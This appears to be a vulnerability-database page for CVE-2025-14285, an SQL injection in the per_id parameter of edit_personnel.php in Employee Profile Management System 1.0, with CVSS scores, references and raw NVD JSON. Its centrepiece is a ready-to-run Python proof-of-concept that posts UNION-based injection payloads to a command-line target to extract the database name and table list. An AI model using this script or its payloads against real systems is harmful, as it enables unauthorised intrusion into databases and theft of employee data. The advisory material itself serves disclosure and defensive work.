CVE-2025-14285

Description

A vulnerability was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_personnel.php. The manipulation of the argument per_id results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:code-projects:employee_profile_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Employee Profile Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14285 SQL Injection PoC
# Target: Employee Profile Management System 1.0
# Vulnerable File: edit_personnel.php
# Vulnerable Parameter: per_id

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in edit_personnel.php
    """
    # Construct the vulnerable URL
    exploit_url = f"{target_url}/edit_personnel.php"
    
    # Prepare the malicious payload
    data = {
        'per_id': payload,
        'submit': 'Update'
    }
    
    try:
        response = requests.post(exploit_url, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

def extract_database_info(target_url):
    """
    Extract database information using UNION-based SQL injection
    """
    # Get database name
    payload_db = "1 UNION SELECT database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--"
    result = exploit_sqli(target_url, payload_db)
    print(f"[+] Database Name Extracted")
    
    # Get tables
    payload_tables = "1 UNION SELECT group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 FROM information_schema.tables WHERE table_schema=database()--"
    result = exploit_sqli(target_url, payload_tables)
    print(f"[+] Tables Extracted")
    
    return result

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14285.py <target_url>")
        print("Example: python cve-2025-14285.py http://target.com/employee")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Exploiting CVE-2025-14285 on {target}")
    extract_database_info(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14285
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14285
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14285/
[4] VulDB https://vuldb.com/cve/CVE-2025-14285
[5] https://code-projects.org/
[6] https://github.com/tiancesec/CVE/issues/15
[7] https://vuldb.com/?ctiid.334873
[8] https://vuldb.com/?id.334873
[9] https://vuldb.com/?submit.702684
[10] https://github.com/tiancesec/CVE/issues/15

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14285", "sourceIdentifier": "[email protected]", "published": "2025-12-09T01:16:54.730", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_personnel.php. The manipulation of the argument per_id results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:code-projects:employee_profile_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4ECD8318-8E3C-4A62-B9A7-170B570C9A64"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/tiancesec/CVE/issues/15", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334873", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334873", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.702684", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/tiancesec/CVE/issues/15", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}